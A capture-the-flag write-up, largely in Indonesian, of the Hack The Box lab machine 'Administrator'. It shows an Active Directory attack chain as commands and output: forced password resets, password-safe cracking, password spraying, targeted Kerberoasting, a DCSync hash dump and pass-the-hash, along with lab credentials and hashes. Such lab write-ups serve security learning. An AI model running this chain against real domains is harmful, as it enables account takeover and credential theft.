Administrator

Information Gathering

Port and Service

# nmap -p- -sVC --min-rate 1000 10.10.11.42
Nmap scan report for 10.10.11.42
Host is up (0.34s latency).
Not shown: 65510 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-23 17:48:53Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49656/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49661/tcp open  msrpc         Microsoft Windows RPC
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
53567/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time: 
|   date: 2025-04-23T17:49:50
|_  start_date: N/A

Bloodhound Collect

                                                                                                             
┌──(me㉿kali)-[~/ctf/administrator/bloodhound-collect]
└─$ bloodhound-python -u "olivia" -p ichliebedich -d administrator.htb -ns 10.10.11.42 -c all
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user

WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno 110] Connection timed out
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 01M 12S

Initial Access - Michael to Benjamin

Olivia memiliki privilege GenericAll ke michael, michael memiliki privilege ForceChangePassword ke benjamin. disini saya mencoba untuk Change password kedua akun tersebut menggunakan net rpc

net rpc password "michael" "Password1" -U "administrator.htb"/"olivia"%"ichliebedich" -S "10.10.11.42"    
net rpc password "benjamin" "Password1" -U "administrator"/"michael"%"Password1" -S "10.10.11.42"

validasi

┌──(me㉿kali)-[~/ctf/administrator]
└─$ nxc smb administrator.htb -u benjamin -p Password1                                        
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\benjamin:Password1

password telah berasil diubah.

Move to Emily

disini saya mencoba mengakses FTP dengan menggunakan akun benjamin dan menemukan file Backup.psafe3

┌──(me㉿kali)-[~/ctf/administrator]
└─$ ftp administrator.htb              
Connected to administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:me): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49942|)
125 Data connection already open; Transfer starting.
10-05-24  09:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||49943|)
150 Opening ASCII mode data connection.
100% |**********************************************************************************|   952        2.27 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (2.26 KiB/s)
ftp> exit
221 Goodbye.

download password safe:

https://github.com/pwsafe/pwsafe/releases/tag/1.21.0

disini membutuhkan Master Password, saya akan menggunakan pwsafe2john untuk mendapatkan password hash

┌──(me㉿kali)-[~/ctf/administrator]
└─$ pwsafe2john Backup.psafe3 
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050

kemudian saya melakukan crack hash tersebut menggunakan john

┌──(me㉿kali)-[~/ctf/administrator]
└─$ john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2025-04-24 01:48) 3.571g/s 43885p/s 43885c/s 43885C/s 123456..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Alexander Smith:alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
Emily Rodriguez:emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
Emma Johnson:emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

selanjutnya saya melakukan spraying password ke users dan mendapatkan akun emily

┌──(me㉿kali)-[~/ctf/administrator]
└─$ nxc smb administrator.htb -u user.txt  -p pass.txt --continue-on-success
[--- SNIP ---]
SMB         10.10.11.42     445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb 
[--- SNIP ---]

Move to Ethan

disini emily memiliki GenericWrite ke ethan, selanjutnya saya akan menggunakan targetedKerberoast.py

┌──(me㉿kali)-[~/ctf/administrator/targetedKerberoast]
└─$ python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' 
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$4f15c4fe697b7809f933b08c1774e32c$ecb2b8cf4445b822548ab893d0ffc5c8682c02658b16070a44bdfc75ff7d3f7dbdb7d7e60154c349250c44afa9dc13a478655d35d491fceb9e12d06a14001d0d265cbbf5ca7290e9f27d97f77520d063b43e79df2c8cea0f7fbc192dee62f1d003f698927fb2d6df87479fccf5f468c7710d2b29df0e43fa346ed8109bfbba109466fc3957e9d8e29bc2e301af676571cf5eb6cb3a732f29dab74b13a9808d85f35a630c00dd273462c8efad5c11b60b748901d017c34b2d5f1c78a0ac10c99555ce4d29788ab1920864f5029e8d694e891e006d608859d810c9cc9b8a169a18297deebc8e895eebadffb2f81bef42258201ecf811b3cac12e1df3b40d0ffe7091e031112c3261c61e96a83d725041cd5a7f37283418d00f3f868a5eedd34145f21ddbcf0642f31ed4c27ca79cf8fded435a71370c835e5373a877cb71d5927b31c650dbf635b9df2e7d1952fcd0dfd5c2318f95218600028fc7e87b503eb28f88d2f7c7b8e6961da9716792b4c846bcbe84a3c466ddb8c7b3c89bdd15ef47917caf3850767cb9b83ec1a44cfaf1d64182c9fff4dd920944d4568ed9927c6dcc43735c8c27ce94ad194c07b7d66664ba199ecc89f72e50a8b447df909911bd89e245577351a0794b05c7e2aacbfcfad48070a3583e48e39778bc4de953390f1095f2943bd303118efb57256dadae26cbf553642eae36f10cc6b3e79c5b5dcfc4cbef5776749b568072170e1e2ca36a88044c32cf11e2d57bd4f8a061d80564035b420b52cf957adc527d95a188e7c32065338d7e85e14c677d964d8cf4fbda8bc1d7d4218f4d6b13ad8324997db09efd3557665ab7d8b00fdd7cdee71c2a925fd213ba3cc8a21331ff5979348a3bc5bcf7cafd2416b2be338dd0e571b8c0443cb52ef9acdbf95ab2a1cd4c17be6d6b5ee7a57a01fe30a560d65cf8b7eb392a432e71188830cc98fa8040ac1af843b34b8cc2005c965249a2fba6f24798f5403cde85d24d309cc93ab22f01a0975795c8431b5190148cb8491b7b7ebd8d9f9bbc8630134b5b0e020b0a33d94607dd4b8e1704d25b2c29e311d5de0dab36dbf51a9294bcd7b7e556cf79b60652abcd13914ea7df34ed2fb1c3501546ebd7ff4fd48c2516260cbf05c93bbac1792ac4ef54c07b3b305dcbfe14751285c9fdb56d8e270d97df6048997d47d2330c8c68bee1cbf4fc13487bc49557c1d16bc3f326e3dc0ab8360523bd2baf2b1e6fb04c55a8e948b8161b3ba20902886966a082f86d2cde57ded331dc9be84ea5353d0ee689219c954b2b630267e02698fcc80eb9250bfbd23f87dbda012b99543b863364b1d6c9f52222540ed696e1a25cb61a0134676d04e8b23a04698b112896e687dd309d2b258bbc0637860023e58426b46efa22e2ca860071c486f2cc6ea70efbbf5c1f692bd3f022b4e68ea359b9017f2cb83696aa2355026a7aa192e7f300c2effd93bd8d7cc511346cdcc8f00004b75d38756f5e60055219b8bf38ce2e9aceebe11df50cbf90b2031c453ebc9ae3c911

selanjutnya saya crack hashnya dengan hashcat

┌──(me㉿kali)-[~/ctf/administrator/targetedKerberoast]
└─$ hashcat ethan.hash /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$4f15c4fe697b7809f933b08c1774e32c$ecb2b8cf4445b822548ab893d0ffc5c8682c02658b16070a44bdfc75ff7d3f7dbdb7d7e60154c349250c44afa9dc13a478655d35d491fceb9e12d06a14001d0d265cbbf5ca7290e9f27d97f77520d063b43e79df2c8cea0f7fbc192dee62f1d003f698927fb2d6df87479fccf5f468c7710d2b29df0e43fa346ed8109bfbba109466fc3957e9d8e29bc2e301af676571cf5eb6cb3a732f29dab74b13a9808d85f35a630c00dd273462c8efad5c11b60b748901d017c34b2d5f1c78a0ac10c99555ce4d29788ab1920864f5029e8d694e891e006d608859d810c9cc9b8a169a18297deebc8e895eebadffb2f81bef42258201ecf811b3cac12e1df3b40d0ffe7091e031112c3261c61e96a83d725041cd5a7f37283418d00f3f868a5eedd34145f21ddbcf0642f31ed4c27ca79cf8fded435a71370c835e5373a877cb71d5927b31c650dbf635b9df2e7d1952fcd0dfd5c2318f95218600028fc7e87b503eb28f88d2f7c7b8e6961da9716792b4c846bcbe84a3c466ddb8c7b3c89bdd15ef47917caf3850767cb9b83ec1a44cfaf1d64182c9fff4dd920944d4568ed9927c6dcc43735c8c27ce94ad194c07b7d66664ba199ecc89f72e50a8b447df909911bd89e245577351a0794b05c7e2aacbfcfad48070a3583e48e39778bc4de953390f1095f2943bd303118efb57256dadae26cbf553642eae36f10cc6b3e79c5b5dcfc4cbef5776749b568072170e1e2ca36a88044c32cf11e2d57bd4f8a061d80564035b420b52cf957adc527d95a188e7c32065338d7e85e14c677d964d8cf4fbda8bc1d7d4218f4d6b13ad8324997db09efd3557665ab7d8b00fdd7cdee71c2a925fd213ba3cc8a21331ff5979348a3bc5bcf7cafd2416b2be338dd0e571b8c0443cb52ef9acdbf95ab2a1cd4c17be6d6b5ee7a57a01fe30a560d65cf8b7eb392a432e71188830cc98fa8040ac1af843b34b8cc2005c965249a2fba6f24798f5403cde85d24d309cc93ab22f01a0975795c8431b5190148cb8491b7b7ebd8d9f9bbc8630134b5b0e020b0a33d94607dd4b8e1704d25b2c29e311d5de0dab36dbf51a9294bcd7b7e556cf79b60652abcd13914ea7df34ed2fb1c3501546ebd7ff4fd48c2516260cbf05c93bbac1792ac4ef54c07b3b305dcbfe14751285c9fdb56d8e270d97df6048997d47d2330c8c68bee1cbf4fc13487bc49557c1d16bc3f326e3dc0ab8360523bd2baf2b1e6fb04c55a8e948b8161b3ba20902886966a082f86d2cde57ded331dc9be84ea5353d0ee689219c954b2b630267e02698fcc80eb9250bfbd23f87dbda012b99543b863364b1d6c9f52222540ed696e1a25cb61a0134676d04e8b23a04698b112896e687dd309d2b258bbc0637860023e58426b46efa22e2ca860071c486f2cc6ea70efbbf5c1f692bd3f022b4e68ea359b9017f2cb83696aa2355026a7aa192e7f300c2effd93bd8d7cc511346cdcc8f00004b75d38756f5e60055219b8bf38ce2e9aceebe11df50cbf90b2031c453ebc9ae3c911:limpbizkit

Move to Administrator

disini ethan memiliki DCSync privilege ke domain administrator.htb, disini saya akan menggunakan impacket-secretsdump untuk melakukan credential dumping

┌──(me㉿kali)-[~/ctf/administrator/targetedKerberoast]
└─$ impacket-secretsdump administrator.htb/ethan:'limpbizkit'@administrator.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:426a0647e264d163ca73ad2abb5fd231387a84f44318b0b451194c67661208bf
administrator.htb\michael:aes128-cts-hmac-sha1-96:536455b20ff25e90aa329cfad802cd28
administrator.htb\michael:des-cbc-md5:a276686494e96e0b
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:a6f5ec12b61b8848d5678efadc6a6ed5a4a26e29a5fab1d6708e9dd6cf04300a
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:3cd383465c836e03b028cb4cb7adc9a5
administrator.htb\benjamin:des-cbc-md5:c8a8e3a880c70e62
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...

berhasil mendapatkan hash administrator, selanjutnya saya melakukan pass the hash dengan evil-winrm dan mendapatkan root.txt

evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

PreviousEscape NextCertified

Last updated 7 months ago